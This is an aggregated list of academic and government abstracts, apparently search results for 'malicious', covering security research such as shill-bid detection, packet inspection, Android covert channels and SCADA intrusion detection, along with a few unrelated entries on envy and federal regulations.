  3. Bidding Agents That Perpetrate Auction Fraud

    NASA Astrophysics Data System (ADS)

    Trevathan, Jarrod; McCabe, Alan; Read, Wayne

This paper presents a software bidding agent that inserts fake bids on the seller's behalf to inflate an auction's price. This behaviour is referred to as shill bidding. Shill bidding is strictly prohibited by online auctioneers, as it defrauds unsuspecting buyers by forcing them to pay more for the item. The malicious bidding agent was constructed to aid in developing shill detection techniques. We have previously documented a simple shill bidding agent that incrementally increases the auction price until it reaches the desired profit target, or until it becomes too risky to continue bidding. This paper presents an adaptive shill bidding agent which, when used over a series of auctions with substitutable items, can revise its strategy based on bidding behaviour in past auctions. The adaptive agent applies a novel prediction technique, referred to as the Extremum Consistency (EC) algorithm, to determine the optimal price to aspire to. The EC algorithm has successfully been used in handwritten signature verification for determining the maximum and minimum values in an input stream. The agent's ability to inflate the price has been tested in a simulated marketplace and experimental results are presented.

  4. A Hybrid CPU/GPU Pattern-Matching Algorithm for Deep Packet Inspection

    PubMed Central

    Chen, Yaw-Chung

    2015-01-01

    The large quantities of data now being transferred via high-speed networks have made deep packet inspection indispensable for security purposes. Scalable and low-cost signature-based network intrusion detection systems have been developed for deep packet inspection for various software platforms. Traditional approaches that only involve central processing units (CPUs) are now considered inadequate in terms of inspection speed. Graphic processing units (GPUs) have superior parallel processing power, but transmission bottlenecks can reduce optimal GPU efficiency. In this paper we describe our proposal for a hybrid CPU/GPU pattern-matching algorithm (HPMA) that divides and distributes the packet-inspecting workload between a CPU and GPU. All packets are initially inspected by the CPU and filtered using a simple pre-filtering algorithm, and packets that might contain malicious content are sent to the GPU for further inspection. Test results indicate that in terms of random payload traffic, the matching speed of our proposed algorithm was 3.4 times and 2.7 times faster than those of the AC-CPU and AC-GPU algorithms, respectively. Further, HPMA achieved higher energy efficiency than the other tested algorithms. PMID:26437335

  6. Appraisal patterns of envy and related emotions.

    PubMed

    van de Ven, Niels; Zeelenberg, Marcel; Pieters, Rik

    2012-06-01

    Envy is a frustrating emotion that arises from upward social comparison. Two studies investigated the appraisals that distinguish benign envy (aimed at improving one's own situation) from malicious envy (aimed at pulling down the superior other). Study 1 found that appraisals of deservingness and control potential differentiated both types of envy. We manipulated these appraisals in Study 2 and found that while both did not influence the intensity of envy, they did determine the type of envy that resulted. The more a situation was appraised as undeserved, the more participants experienced malicious envy. Benign envy was experienced more when the situation was not undeserved, and the most when the situation was appraised as both deserved and controllable. The current research also clarifies how the types of envy differ from the related emotions admiration and resentment.

  7. Cyber Security: Big Data Think II Working Group Meeting

    NASA Technical Reports Server (NTRS)

    Hinke, Thomas; Shaw, Derek

    2015-01-01

This presentation focuses on approaches that could be used by a data computation center to identify attacks and ensure that malicious code and backdoors are identified if planted in the system. The goal is to identify actionable security information from the mountain of data that flows into and out of an organization. The approaches are applicable to big data computational centers, and some must also use big data techniques to extract the actionable security information from the mountain of data that flows into and out of a data computational center. The briefing covers the detection of malicious delivery sites and techniques for reducing the mountain of data so that intrusion detection information can be useful, and not hidden in a plethora of false alerts. It also looks at the identification of possible unauthorized data exfiltration.

  8. A Secure Scheme for Distributed Consensus Estimation against Data Falsification in Heterogeneous Wireless Sensor Networks.

    PubMed

    Mi, Shichao; Han, Hui; Chen, Cailian; Yan, Jian; Guan, Xinping

    2016-02-19

    Heterogeneous wireless sensor networks (HWSNs) can achieve more tasks and prolong the network lifetime. However, they are vulnerable to attacks from the environment or malicious nodes. This paper is concerned with the issues of a consensus secure scheme in HWSNs consisting of two types of sensor nodes. Sensor nodes (SNs) have more computation power, while relay nodes (RNs) with low power can only transmit information for sensor nodes. To address the security issues of distributed estimation in HWSNs, we apply the heterogeneity of responsibilities between the two types of sensors and then propose a parameter adjusted-based consensus scheme (PACS) to mitigate the effect of the malicious node. Finally, the convergence property is proven to be guaranteed, and the simulation results validate the effectiveness and efficiency of PACS.

  9. Security Issues for Mobile Medical Imaging: A Primer.

    PubMed

    Choudhri, Asim F; Chatterjee, Arindam R; Javan, Ramin; Radvany, Martin G; Shih, George

    2015-10-01

    The end-user of mobile device apps in the practice of clinical radiology should be aware of security measures that prevent unauthorized use of the device, including passcode policies, methods for dealing with failed login attempts, network manager-controllable passcode enforcement, and passcode enforcement for the protection of the mobile device itself. Protection of patient data must be in place that complies with the Health Insurance Portability and Accountability Act and U.S. Federal Information Processing Standards. Device security measures for data protection include methods for locally stored data encryption, hardware encryption, and the ability to locally and remotely clear data from the device. As these devices transfer information over both local wireless networks and public cell phone networks, wireless network security protocols, including wired equivalent privacy and Wi-Fi protected access, are important components in the chain of security. Specific virtual private network protocols, Secure Sockets Layer and related protocols (especially in the setting of hypertext transfer protocols), native apps, virtual desktops, and nonmedical commercial off-the-shelf apps require consideration in the transmission of medical data over both private and public networks. Enterprise security and management of both personal and enterprise mobile devices are discussed. Finally, specific standards for hardware and software platform security, including prevention of hardware tampering, protection from malicious software, and application authentication methods, are vital components in establishing a secure platform for the use of mobile devices in the medical field. © RSNA, 2015.

  10. Generic Detection of Register Realignment

    NASA Astrophysics Data System (ADS)

    Ďurfina, Lukáš; Kolář, Dušan

    2011-09-01

Register realignment is a method of binary obfuscation used by malware writers. The paper introduces a method by which register realignment can be recognized by analysis based on scattered context grammars. Such an analysis includes exploration of the bytes affected by realignment, finding new valid values for them, building the scattered context grammar and parsing the obfuscated code with this grammar. The created grammar has the LL property, i.e. it can be parsed by an LL parser.

  12. ARL Summer Student Research Symposium. Volume 1: Select Papers

    DTIC Science & Technology

    2012-08-01

deploying Android smart phones and tablets on the battlefield, which may be a target for malware. In our research, we attempt to improve static...network. (a) The T1 and MRI images are (b) segmented into different material components. The segmented geometry is then used to create (c) a finite element...towards finding a method to detect mTBI non-invasively. One method in particular includes the use of a magnetic resonance image (MRI)-based imaging

  13. Cyber for the Middleweight Fighter: Recommendations for Cyberspace Capabilities for the United States Marine Corps

    DTIC Science & Technology

    2013-02-14

    L acts to “provided resources for national and joint kinetic attack requirements.”24 Additionally, the Marine Corps Force Structure Review Group...for unusual system activity and searching for signs of known malware, unlike what is depicted in movies such as Hackers, where opposing cyber...never admitted involvement but the attacks originated in Russia. The FBI code name for the inquiry was Moonlight Maze. 29. Jeffrey Carr, Inside Cyber

  14. Binary Code Extraction and Interface Identification for Security Applications

    DTIC Science & Technology

    2009-10-02

    the functions extracted during the end-to-end applications and at the bottom some additional functions extracted from the OpenSSL library. fact that as...mentioned in Section 5.1 through Section 5.3 and some additional functions that we extract from the OpenSSL library for evaluation purposes. The... OpenSSL functions, the false positives and negatives are measured by comparison with the original C source code. For the malware samples, no source is

  15. The MAL: A Malware Analysis Lexicon

    DTIC Science & Technology

    2013-02-01

    we feel that further exploration of the open source literature is a promising avenue for enlarging the corpus. 2.3 Publishing the MAL Early in the...MAL. We feel that the advantages of this format are well worth the small incremental cost. The distribution of the MAL in this format is under...dictionary. We feel that moving to a richer format such as WordNet or WordVis would greatly improve the usability of the lexicon. 3.5 Improved Hosting The

  16. A new sensors-based covert channel on android.

    PubMed

    Al-Haiqi, Ahmed; Ismail, Mahamod; Nordin, Rosdiadee

    2014-01-01

Covert channels are not new in computing systems, and have been studied since their first definition four decades ago. New platforms call for thorough investigations to assess their security. Now is the time for the Android platform to analyze its security model, in particular the two key principles: process isolation and the permissions system. Aside from all sorts of malware, one threat has proved intractable for current protection solutions, namely collusion attacks involving two applications communicating over covert channels. Still no universal solution can counter this sort of attack unless the covert channels are known. This paper is an attempt to reveal a new covert channel, not only specific to smartphones, but also exploiting an unusual resource as a vehicle to carry covert information: sensor data. Accelerometers generate signals that reflect user motions, and malware applications can apparently only read their data. However, if the vibration motor on the device is used properly, programmatically produced vibration patterns can encode stolen data, and hence an application can cause discernible effects on acceleration data to be received and decoded by another application. Our evaluations confirmed a real threat where strings of tens of characters could be transmitted error-free if the throughput is reduced to around 2.5-5 bps. The proposed covert channel is very stealthy as no unusual permissions are required and there is no explicit communication between the colluding applications.

  18. 32 CFR 842.42 - Delegations of authority.

    Code of Federal Regulations, 2010 CFR

    2010-07-01

    ... claims in any amount: (i) The Deputy Judge Advocate General. (ii) The Director of Civil Law. (iii) The... process, or malicious prosecution committed by an investigative or law enforcement officer. (4) On-base...

  4. Detecting insider activity using enhanced directory virtualization.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Shin, Dongwan; Claycomb, William R.

    2010-07-01

Insider threats often target authentication and access control systems, which are frequently based on directory services. Detecting these threats is challenging, because malicious users with the technical ability to modify these structures often have sufficient knowledge and expertise to conceal unauthorized activity. The use of directory virtualization to monitor various systems across an enterprise can be a valuable tool for detecting insider activity. The addition of a policy engine to directory virtualization services enhances monitoring capabilities by allowing greater flexibility in analyzing changes for malicious intent. The resulting architecture is a system-based approach, where the relationships and dependencies between data sources and directory services are used to detect an insider threat, rather than simply relying on point solutions. This paper presents such an architecture in detail, including a description of implementation results.

  5. Formal Analysis of Key Integrity in PKCS#11

    NASA Astrophysics Data System (ADS)

    Falcone, Andrea; Focardi, Riccardo

PKCS#11 is a standard API to cryptographic devices such as smartcards, hardware security modules and USB crypto-tokens. Though widely adopted, this API has been shown to be prone to attacks in which a malicious user gains access to the sensitive keys stored in the devices. In 2008, Delaune, Kremer and Steel proposed a model to formally reason about this kind of attack. We extend this model to also describe flaws that are based on integrity violations of the stored keys. In particular, we consider scenarios in which a malicious overwriting of keys might fool honest users into using the attacker's own keys while performing sensitive operations. We further enrich the model with a trusted key mechanism ensuring that only controlled, non-tampered keys are used in cryptographic operations, and we show how this modified API prevents the above-mentioned key-replacement attacks.

  6. Comparison analysis on vulnerability of metro networks based on complex network

    NASA Astrophysics Data System (ADS)

    Zhang, Jianhua; Wang, Shuliang; Wang, Xiaoyuan

    2018-04-01

This paper analyzes the networked characteristics of three metro networks, and two malicious attacks are employed to investigate the vulnerability of metro networks based on connectivity vulnerability and functionality vulnerability. Meanwhile, the networked characteristics and vulnerability of the three metro networks are compared with each other. The results show that the Shanghai metro network has the largest transport capacity, the Beijing metro network has the best local connectivity and the Guangzhou metro network has the best global connectivity; moreover, the Beijing metro network has the most homogeneous degree distribution. Furthermore, we find that metro networks are very vulnerable when subjected to malicious attacks, and the Guangzhou metro network has the best topological structure and reliability among the three metro networks. The results indicate that the proposed methodology is feasible and effective for investigating the vulnerability and exploring better topological structures of metro networks.

  7. Investigating weaknesses in Android certificate security

    NASA Astrophysics Data System (ADS)

    Krych, Daniel E.; Lange-Maney, Stephen; McDaniel, Patrick; Glodek, William

    2015-05-01

Android's application market relies on secure certificate generation to establish trust between applications and their users; yet, cryptography is often not a priority for application developers and many fail to take the necessary security precautions. Indeed, there is cause for concern: several recent high-profile studies have observed a pervasive lack of entropy on Web systems leading to the factorization of private keys.1 Sufficient entropy, or randomness, is essential to generate secure key pairs and combat predictable key generation. In this paper, we analyze the security of Android certificates. We investigate the entropy present in 550,000 Android application certificates using the Quasilinear GCD finding algorithm.1 Our results show that while the lack of entropy does not appear to be as ubiquitous in the mobile markets as on Web systems, there is substantial reuse of certificates: only one third of the certificates in our dataset were unique. In other words, we find that organizations frequently reuse certificates for different applications. While such a practice is acceptable under Google's specifications for a single developer, we find that in some cases the same certificates are used by a myriad of developers, potentially compromising Android's intended trust relationships. Further, we observed duplicate certificates being used by both malicious and non-malicious applications. The top 3 repeated certificates present in our dataset accounted for a total of 11,438 separate APKs. Of these applications, 451, or roughly 4%, were identified as malicious by antivirus services.

  8. Vital area identification for U.S. Nuclear Regulatory Commission nuclear power reactor licensees and new reactor applicants.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Whitehead, Donnie Wayne; Varnado, G. Bruce

    2008-09-01

U.S. Nuclear Regulatory Commission nuclear power plant licensees and new reactor applicants are required to provide protection of their plants against radiological sabotage, including the placement of vital equipment in vital areas. This document describes a systematic process for the identification of the minimum set of areas that must be designated as vital areas in order to ensure that all radiological sabotage scenarios are prevented. Vital area identification involves the use of logic models to systematically identify all of the malicious acts or combinations of malicious acts that could lead to radiological sabotage. The models available in the plant probabilistic risk assessment and other safety analyses provide a great deal of the information and basic model structure needed for the sabotage logic model. Once the sabotage logic model is developed, the events (or malicious acts) in the model are replaced with the areas in which the events can be accomplished. This sabotage area logic model is then analyzed to identify the target sets (combinations of areas the adversary must visit to cause radiological sabotage) and the candidate vital area sets (combinations of areas that must be protected against adversary access to prevent radiological sabotage). Any one of the candidate vital area sets can be selected for protection. Appropriate selection criteria will allow the licensee or new reactor applicant to minimize the impacts of vital area protection measures on plant safety, cost, operations, or other factors of concern.

  9. Legal Aspects of Confrontation

    ERIC Educational Resources Information Center

    Shannon, Thomas A.

    1970-01-01

    High school principals are obligated to protect the property and students entrusted to their care. As long as any action they take against student dissenters resorting to violence is non-malicious, they need not fear legal repercussions. (CK)

  10. Streaming PCA with many missing entries.

    DOT National Transportation Integrated Search

    2015-12-01

This paper considers the problem of matrix completion when some number of the columns are completely and arbitrarily corrupted, potentially by a malicious adversary. It is well-known that standard algorithms for matrix completion can return arbit...

  11. Protecting Cryptographic Keys and Functions from Malware Attacks

    DTIC Science & Technology

    2010-12-01

registers. modifies RSA private key signing in OpenSSL to use the technique. The resulting system has the following features: 1. No special hardware is...the above method based on OpenSSL, by exploiting the Streaming SIMD Extension (SSE) XMM registers of modern Intel and AMD x86-compatible CPUs [22...one can store a 2048-bit exponent.1 Our prototype is based on OpenSSL 0.9.8e, the Ubuntu 6.06 Linux distribution with a 2.6.15 kernel, and SSE2 which

  12. A Survey of XOR as a Digital Obfuscation Technique in a Corpus of Real Data

    DTIC Science & Technology

    2014-01-17

changing nine-byte key [30]. Even advanced malware, such as Stuxnet, Duqu, Flame, and Red October, were observed to use XOR as the basis of a simple...obfuscation algorithm to hide data that they were stealing [37]. Stuxnet uses a 31-byte key with XOR [15]. Duqu XORs data from its keylogger and sends it...back to its server [37]. Similar to Duqu, Flame employs XOR obfuscation techniques on captured data, but contains extensive data-capturing features

  13. 78 FR 65923 - Schedules of Controlled Substances: Placement of Tramadol Into Schedule IV

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-11-04

    ... own motion; (2) at the request of the Secretary of the HHS; or (3) on the petition of any interested... reaction, overmedication, malicious poisoning, and accidental ingestion). Non-medical use may involve...

  14. Consensus-Based Cooperative Spectrum Sensing with Improved Robustness Against SSDF Attacks

    NASA Astrophysics Data System (ADS)

    Liu, Quan; Gao, Jun; Guo, Yunwei; Liu, Siyang

    2011-05-01

Based on the consensus algorithm, an attack-proof cooperative spectrum sensing (CSS) scheme is presented for decentralized cognitive radio networks (CRNs), where a common fusion center is not available and some malicious users may launch attacks with spectrum sensing data falsification (SSDF). Local energy detection is first performed by each secondary user (SU), and then, utilizing consensus notions, each SU can make its own decision individually through local information exchange with its neighbors only, rather than through the centralized fusion used in most existing schemes. With the help of some anti-attack measures, each authentic SU can generally identify and exclude malicious reports during the interactions within its neighborhood. Compared with the existing solutions, the proposed scheme is proved to have much better robustness against three categories of SSDF attack, without requiring any a priori knowledge of the whole network.

  15. A Distributed Energy-Aware Trust Management System for Secure Routing in Wireless Sensor Networks

    NASA Astrophysics Data System (ADS)

    Stelios, Yannis; Papayanoulas, Nikos; Trakadas, Panagiotis; Maniatis, Sotiris; Leligou, Helen C.; Zahariadis, Theodore

    Wireless sensor networks are inherently vulnerable to security attacks, due to their wireless operation. The situation is further aggravated because they operate in an infrastructure-less environment, which mandates the cooperation among nodes for all networking tasks, including routing, i.e. all nodes act as “routers”, forwarding the packets generated by their neighbours in their way to the sink node. This implies that malicious nodes (denying their cooperation) can significantly affect the network operation. Trust management schemes provide a powerful tool for the detection of unexpected node behaviours (either faulty or malicious). Once misbehaving nodes are detected, their neighbours can use this information to avoid cooperating with them either for data forwarding, data aggregation or any other cooperative function. We propose a secure routing solution based on a novel distributed trust management system, which allows for fast detection of a wide set of attacks and also incorporates energy awareness.

  16. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Beaver, Justin M; Borges, Raymond Charles; Buckner, Mark A

    Critical infrastructure Supervisory Control and Data Acquisition (SCADA) systems were designed to operate on closed, proprietary networks where a malicious insider posed the greatest threat potential. The centralization of control and the movement towards open systems and standards has improved the efficiency of industrial control, but has also exposed legacy SCADA systems to security threats that they were not designed to mitigate. This work explores the viability of machine learning methods in detecting the new threat scenarios of command and data injection. Similar to network intrusion detection systems in the cyber security domain, the command and control communications in a critical infrastructure setting are monitored, and vetted against examples of benign and malicious command traffic, in order to identify potential attack events. Multiple learning methods are evaluated using a dataset of Remote Terminal Unit communications, which included both normal operations and instances of command and data injection attack scenarios.

  17. The emotional responses of browsing Facebook: Happiness, envy, and the role of tie strength.

    PubMed

    Lin, Ruoyun; Utz, Sonja

    2015-11-01

    On Facebook, users are exposed to posts from both strong and weak ties. Even though several studies have examined the emotional consequences of using Facebook, less attention has been paid to the role of tie strength. This paper aims to explore the emotional outcomes of reading a post on Facebook and examine the role of tie strength in predicting happiness and envy. Two studies - one correlational, based on a sample of 207 American participants and the other experimental, based on a sample of 194 German participants - were conducted in 2014. In Study 2, envy was further distinguished into benign and malicious envy. Based on a multi-method approach, the results showed that positive emotions are more prevalent than negative emotions while browsing Facebook. Moreover, tie strength is positively associated with the feeling of happiness and benign envy, whereas malicious envy is independent of tie strength after reading a (positive) post on Facebook.

  18. Radiological Exposure Devices (RED) Technical Basis for Threat Profile.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bland, Jesse John; Potter, Charles A.; Homann, Steven

    Facilities that manufacture, store or transport significant quantities of radiological material must protect against the risk posed by sabotage events. Much of the analysis of this type of event has been focused on the threat from a radiological dispersion device (RDD) or "dirty bomb" scenario, in which a malicious assailant would, by explosives or other means, loft a significant quantity of radioactive material into a plume that would expose and contaminate people and property. Although the consequences in cost and psychological terror would be severe, no intentional RDD terrorism events are on record. Conversely, incidents in which a victim or victims were maliciously exposed to a Radiological Exposure Device (RED), without dispersal of radioactive material, are well documented. This paper represents a technical basis for the threat profile related to the risk of nefarious use of an RED, including assailant and material characterization. Radioactive materials of concern are detailed in Appendix A.

  19. Detecting malicious chaotic signals in wireless sensor network

    NASA Astrophysics Data System (ADS)

    Upadhyay, Ranjit Kumar; Kumari, Sangeeta

    2018-02-01

    In this paper, an e-epidemic Susceptible-Infected-Vaccinated (SIV) model has been proposed to analyze the effect of node immunization and worm-attack dynamics in wireless sensor networks. A modified nonlinear incidence rate with cyrtoid type functional response has been considered using a sleep and active mode approach. Detailed stability analysis and the sufficient criteria for the persistence of the model system have been established. We also established different types of bifurcation analysis for different equilibria at different critical points of the control parameters. We performed a detailed Hopf bifurcation analysis and determined the direction and stability of the bifurcating periodic solutions using the center manifold theorem. Numerical simulations are carried out to confirm the theoretical results. The impact of the control parameters on the dynamics of the model system has been investigated and malicious chaotic signals are detected. Finally, we have analyzed the effect of time delay on the dynamics of the model system.

  20. Real-Time SCADA Cyber Protection Using Compression Techniques

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Lyle G. Roybal; Gordon H Rueff

    2013-11-01

    The Department of Energy’s Office of Electricity Delivery and Energy Reliability (DOE-OE) has a critical mission to secure the energy infrastructure from cyber attack. Through DOE-OE’s Cybersecurity for Energy Delivery Systems (CEDS) program, the Idaho National Laboratory (INL) has developed a method to detect malicious traffic on Supervisory Control and Data Acquisition (SCADA) networks using a data compression technique. SCADA network traffic is often repetitive with only minor differences between packets. Research performed at the INL showed that SCADA network traffic has traits desirable for using compression analysis to identify abnormal network traffic. An open source implementation of a Lempel-Ziv-Welch (LZW) lossless data compression algorithm was used to compress and analyze surrogate SCADA traffic. Infected SCADA traffic was found to have statistically significant differences in compression when compared against normal SCADA traffic at the packet level. The initial analyses and results are clearly able to identify malicious network traffic from normal traffic at the packet level with a very high confidence level across multiple ports and traffic streams. Statistical differentiation between infected and normal traffic was possible using a modified data compression technique at the 99% probability level for all data analyzed. However, the conditions tested were rather limited in scope and need to be expanded into more realistic simulations of hacking events using techniques and approaches that are better representative of a real-world attack on a SCADA system. Nonetheless, the use of compression techniques to identify malicious traffic on SCADA networks in real time appears to have significant merit for infrastructure protection.

  1. A robust cooperative spectrum sensing scheme based on Dempster-Shafer theory and trustworthiness degree calculation in cognitive radio networks

    NASA Astrophysics Data System (ADS)

    Wang, Jinlong; Feng, Shuo; Wu, Qihui; Zheng, Xueqiang; Xu, Yuhua; Ding, Guoru

    2014-12-01

    Cognitive radio (CR) is a promising technology that brings about remarkable improvement in spectrum utilization. To tackle the hidden terminal problem, cooperative spectrum sensing (CSS), which benefits from spatial diversity, has been studied extensively. Since CSS is vulnerable to attacks initiated by malicious secondary users (SUs), several secure CSS schemes based on Dempster-Shafer theory have been proposed. However, the existing works only utilize the current difference of SUs, such as the difference in SNR or similarity degree, to evaluate the trustworthiness of each SU. As the current difference is only one-sided and sometimes inaccurate, the statistical information contained in each SU's historical behavior should not be overlooked. In this article, we propose a robust CSS scheme based on Dempster-Shafer theory and trustworthiness degree calculation. It is carried out in four successive steps, which are basic probability assignment (BPA), trustworthiness degree calculation, selection and adjustment of BPA, and combination by the Dempster-Shafer rule, respectively. Our proposed scheme evaluates the trustworthiness degree of SUs from both the current difference aspect and the historical behavior aspect and exploits Dempster-Shafer theory's potential to establish a 'soft update' approach for reputation value maintenance. It can not only differentiate malicious SUs from honest ones based on their historical behaviors but also reserve the current difference for each SU to achieve better real-time performance. Abundant simulation results have validated that the proposed scheme outperforms the existing ones under the impact of different attack patterns and different numbers of malicious SUs.

  2. 25 CFR 1000.272 - Do Tribes/Consortia need to be aware of areas which FTCA does not cover?

    Code of Federal Regulations, 2010 CFR

    2010-04-01

    ... imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, unless otherwise authorized by 28 U.S.C. 2680(h). (b) What...

  3. A Study of Gaps in Attack Analysis

    DTIC Science & Technology

    2016-10-12

    2014. [86] Shobha Venkataraman, David Brumley, Subhabrata Sen, and Oliver Spatscheck. Automatically Inferring the Evolution of Malicious Activity on...Shobha Venkataraman, Subhabrata Sen, Oliver Spatscheck, Patrick Haffner, and Dawn Song. Exploiting Network Structure for Proactive Spam Mitigation. In

  4. Protecting computer-based medical devices: defending against viruses and other threats.

    PubMed

    2005-07-01

    The increasing integration of computer hardware has exposed medical devices to greater risks than ever before. More and more devices rely on commercial off-the-shelf software and operating systems, which are vulnerable to the increasing proliferation of viruses and other malicious programs that target computers. Therefore, it is necessary for hospitals to take steps such as those outlined in this article to ensure that their computer-based devices are made safe and continue to remain safe in the future. Maintaining the security of medical devices requires planning, careful execution, and a commitment of resources. A team should be created to develop a process for surveying the security status of all computerized devices in the hospital and making sure that patches and other updates are applied as needed. These patches and updates should be approved by the medical system supplier before being implemented. The team should consider using virtual local area networks to isolate susceptible devices on the hospital's network. All security measures should be carefully documented, and the documentation should be kept up-to-date. Above all, care must be taken to ensure that medical device security involves a collaborative, supportive partnership between the hospital's information technology staff and biomedical engineering personnel.

  5. Fast Flux Watch: A mechanism for online detection of fast flux networks.

    PubMed

    Al-Duwairi, Basheer N; Al-Hammouri, Ahmad T

    2014-07-01

    Fast flux networks represent a special type of botnets that are used to provide highly available web services to a backend server, which usually hosts malicious content. Detection of fast flux networks continues to be a challenging issue because of the similar behavior between these networks and other legitimate infrastructures, such as CDNs and server farms. This paper proposes Fast Flux Watch (FF-Watch), a mechanism for online detection of fast flux agents. FF-Watch is envisioned to exist as a software agent at leaf routers that connect stub networks to the Internet. The core mechanism of FF-Watch is based on the inherent feature of fast flux networks: flux agents within stub networks take the role of relaying client requests to point-of-sale websites of spam campaigns. The main idea of FF-Watch is to correlate incoming TCP connection requests to flux agents within a stub network with outgoing TCP connection requests from the same agents to the point-of-sale website. Theoretical and traffic trace driven analysis shows that the proposed mechanism can be utilized to efficiently detect fast flux agents within a stub network.

  6. Approaches for scalable modeling and emulation of cyber systems : LDRD final report.

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Mayo, Jackson R.; Minnich, Ronald G.; Armstrong, Robert C.

    2009-09-01

    The goal of this research was to combine theoretical and computational approaches to better understand the potential emergent behaviors of large-scale cyber systems, such as networks of ~10^6 computers. The scale and sophistication of modern computer software, hardware, and deployed networked systems have significantly exceeded the computational research community's ability to understand, model, and predict current and future behaviors. This predictive understanding, however, is critical to the development of new approaches for proactively designing new systems or enhancing existing systems with robustness to current and future cyber threats, including distributed malware such as botnets. We have developed preliminary theoretical and modeling capabilities that can ultimately answer questions such as: How would we reboot the Internet if it were taken down? Can we change network protocols to make them more secure without disrupting existing Internet connectivity and traffic flow? We have begun to address these issues by developing new capabilities for understanding and modeling Internet systems at scale. Specifically, we have addressed the need for scalable network simulation by carrying out emulations of a network with ~10^6 virtualized operating system instances on a high-performance computing cluster - a 'virtual Internet'. We have also explored mappings between previously studied emergent behaviors of complex systems and their potential cyber counterparts. Our results provide foundational capabilities for further research toward understanding the effects of complexity in cyber systems, to allow anticipating and thwarting hackers.

  7. A guide to California's breaches. First year of state reporting requirement reveals common privacy violations.

    PubMed

    Dimick, Chris

    2010-04-01

    Effective January 1, 2009, California healthcare providers were required to report every breach of patient information to the state. They have sent a flood of mishaps and a steady stream of malicious acts.

  8. 12 CFR 263.94 - Conduct warranting sanctions.

    Code of Federal Regulations, 2010 CFR

    2010-01-01

    ... an attorney, or debarment or suspension from practice as a certified public accountant or public... that individual's period of suspension, debarment, or ineligibility; (f) Contemptuous conduct in... circulating or publishing malicious or libelous matter; (g) Suspension or debarment from practice before the...

  9. 76 FR 22925 - Assumption Buster Workshop: Abnormal Behavior Detection Finds Malicious Actors

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-04-25

    ... Technology Research and Development (NITRD) Program, National Science Foundation. ACTION: Call for... NATIONAL SCIENCE FOUNDATION Assumption Buster Workshop: Abnormal Behavior Detection Finds...: The NCO, on behalf of the Special Cyber Operations Research and Engineering (SCORE) Committee, an...

  10. Data Integrity: Backup

    ERIC Educational Resources Information Center

    Bergren, Martha Dewey

    2005-01-01

    School nurses and health office staff have an ethical and legal obligation to protect the integrity of electronic student health records. Various sources, both accidental and malicious, can threaten student health data. School nurses must employ regular and reliable methods to back up student health data.

  11. Finding Malicious Cyber Discussions in Social Media

    DTIC Science & Technology

    2015-12-11

    automatically filter cyber discussions from Stack Exchange, Reddit, and Twitter posts written in English. Criminal hackers often use social media...monitoring hackers on Facebook and in private chat rooms. As a result, system administrators were prepared to counter distributed denial-of-service

  12. Malware Memory Analysis for Non-Specialists: Investigating Publicly Available Memory Image for the Stuxnet Worm

    DTIC Science & Technology

    2013-11-01

    may be considered moderately suspicious. [20, 21, 22 and 23] PID 1580 (jqs.exe) is using port 5152, a port associated with Java Quick Starter [26...spoolsv.exe 0x01000000 True False True \\WINDOWS\\system32\\spoolsv.exe 1580 jqs.exe 0x00400000 True False True \\Program Files\\Java\\jre6\\bin\\jqs.exe 1664...Files\\Java\\Java Update\\jusched.exe 1816 VMUpgradeHelper 0x00400000 True False True \\Program Files\\VMware\\VMware Tools\\VMUpgradeHelper.exe 1872

  13. Malware Memory Analysis for Non-specialists: Investigating Publicly Available Memory Image 0zapftis (R2D2)

    DTIC Science & Technology

    2013-10-01

    investigators can conduct meaningful memory-based investigations on their own. This technical memorandum examines the 0zapftis (R2D2) Trojan horse, in order...TM 2013-018 and TM 2013-155, examined the Zeus Trojan horse (the former) while the latter examined the Prolaco worm and SpyEye Trojan horse. It is...necessary for a novice to conduct such memory analyses on his own. The first report in this series written by the author examined the Zeus Trojan Horse

  14. 32 CFR 536.45 - Statutory exceptions.

    Code of Federal Regulations, 2010 CFR

    2010-07-01

    ... employee of the government, whether or not the discretion is abused. This exclusion does not apply to a... imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, except for acts or omissions of investigation of law...

  15. 25 CFR 900.183 - Do Indian tribes and tribal organizations need to be aware of areas which FTCA does not cover?

    Code of Federal Regulations, 2010 CFR

    2010-04-01

    ..., battery, false imprisonment, false arrest, malicious prosecution, abuse of process, libel, slander, misrepresentation, deceit, or interference with contract rights, unless otherwise authorized by 28 U.S.C. 2680(h...

  16. Malicious Activity Simulation Tool (MAST) and Trust

    DTIC Science & Technology

    2015-06-01

    application through discovery and remediation of flaws. B. DESIGN AND DEVELOPMENT CONSIDERATIONS Design and development focuses on the actual...protection of the backup and restoration of the application. COBR-1 X V-16846 The IAO will ensure a disaster recovery plan exists in accordance

  17. 27 CFR 70.609 - Supervision.

    Code of Federal Regulations, 2010 CFR

    2010-04-01

    ... 27 Alcohol, Tobacco Products and Firearms 2 2010-04-01 2010-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

  18. 27 CFR 70.609 - Supervision.

    Code of Federal Regulations, 2014 CFR

    2014-04-01

    ... 27 Alcohol, Tobacco Products and Firearms 2 2014-04-01 2014-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

  19. 27 CFR 70.609 - Supervision.

    Code of Federal Regulations, 2011 CFR

    2011-04-01

    ... 27 Alcohol, Tobacco Products and Firearms 2 2011-04-01 2011-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

  20. 27 CFR 70.609 - Supervision.

    Code of Federal Regulations, 2013 CFR

    2013-04-01

    ... 27 Alcohol, Tobacco Products and Firearms 2 2013-04-01 2013-04-01 false Supervision. 70.609... From Disaster, Vandalism, or Malicious Mischief Destruction of Liquors § 70.609 Supervision. When... official or made unmarketable, the liquors shall be destroyed by suitable means under supervision...

